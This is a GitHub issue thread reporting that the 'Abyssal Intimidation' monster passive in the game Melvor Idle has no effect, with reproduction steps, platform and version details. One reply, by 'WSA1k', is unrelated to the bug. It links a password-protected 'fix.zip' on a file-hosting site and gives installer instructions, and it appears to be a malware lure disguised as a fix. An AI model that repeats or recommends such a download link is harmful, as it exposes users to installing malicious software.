### ISSUE TITLE
[Bug]: Abyssal Intimidation has no effect

### ISSUE THREAD

**Issue by Ayarez** [MelvorIdle/melvoridle.github.io#4599]
### Describe the bug

Abyssal Intimidation
Gives you: -50% Abyssal Resistance

This passive ability on a few of the Into the Abyss monsters doesn't actually seem to do anything

### Reproduction Steps

1. Fight monster with Abyssal Intimidation
2. Look at Abyssal Resistance before and after starting the fight
3. -50% Abyssal Resistance not being applied

### Expected behaviour

-50% Abyssal Resistance being applied

### Which platforms are you experiencing this bug on?

- [ ] Chrome
- [ ] Firefox
- [ ] Edge
- [ ] Safari
- [X] Steam
- [ ] Epic Games
- [ ] Mobile App (iOS)
- [ ] Mobile App (Android)
- [ ] Mobile App (Android Beta)
- [ ] Other (Please Specify)

### Which expansions are purchased and active at the time of the bug?

- [X] Throne of the Herald
- [X] Atlas of Discovery
- [X] Into the Abyss

### Which version of the game are you experiencing this bug on?

v1.3

### Game Subversion

?11753

### Are you using any mods?

Yes

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Ayarez** [comment]
Further information: Monsters in the Abyssal Slayer Area: Eldritch Chasm and Tendril Hollow seem to have these passives
